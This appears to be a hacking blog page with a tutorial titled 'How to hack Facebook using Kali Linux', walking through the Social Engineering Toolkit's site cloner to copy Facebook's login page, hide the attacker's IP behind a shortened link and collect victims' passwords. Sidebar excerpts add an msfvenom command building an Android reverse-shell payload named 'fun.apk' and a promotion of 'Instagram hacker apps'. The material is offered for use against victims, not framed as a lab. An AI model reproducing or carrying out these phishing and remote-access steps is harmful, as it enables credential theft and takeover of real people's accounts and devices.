Skip to main content

How to hack Facebook using Kali Linux : CREDENTIALS HARVESTER ATTACK.


WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

STEPS:

1. Boot up kali linux on your machine and open terminal.
 
2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit
 
3. Enter 'y' to agree the social engineering toolkit terms and conditions.
 
4. Select the following options one by one from the menu
 
                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then
 
5. Type '2' (Site cloner)
 
          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com
 
    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
 
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Comments

Popular posts from this blog

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...